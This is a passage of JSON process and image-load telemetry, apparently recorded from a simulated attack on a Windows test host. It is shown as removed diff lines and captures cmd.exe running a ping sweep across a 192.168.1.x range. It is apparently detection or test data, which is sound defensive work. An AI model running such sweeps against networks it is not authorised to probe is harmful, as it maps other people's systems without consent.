"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 
1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "process", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572486840000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.104", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7916, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": 
"kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7916, - "process_name": "PING.EXE", 
- "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "process", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572491990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.105", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8152, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572492130000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "process", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572496840000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.106", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6008, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "process", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572501990000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.107", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4128, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "process", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572506840000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.108", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7068, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "process", - 
"pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572511830000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.109", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3052, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - 
"unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572511980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "event_type": "process", - "pid": 3052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572516840000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.110", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1752, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": 
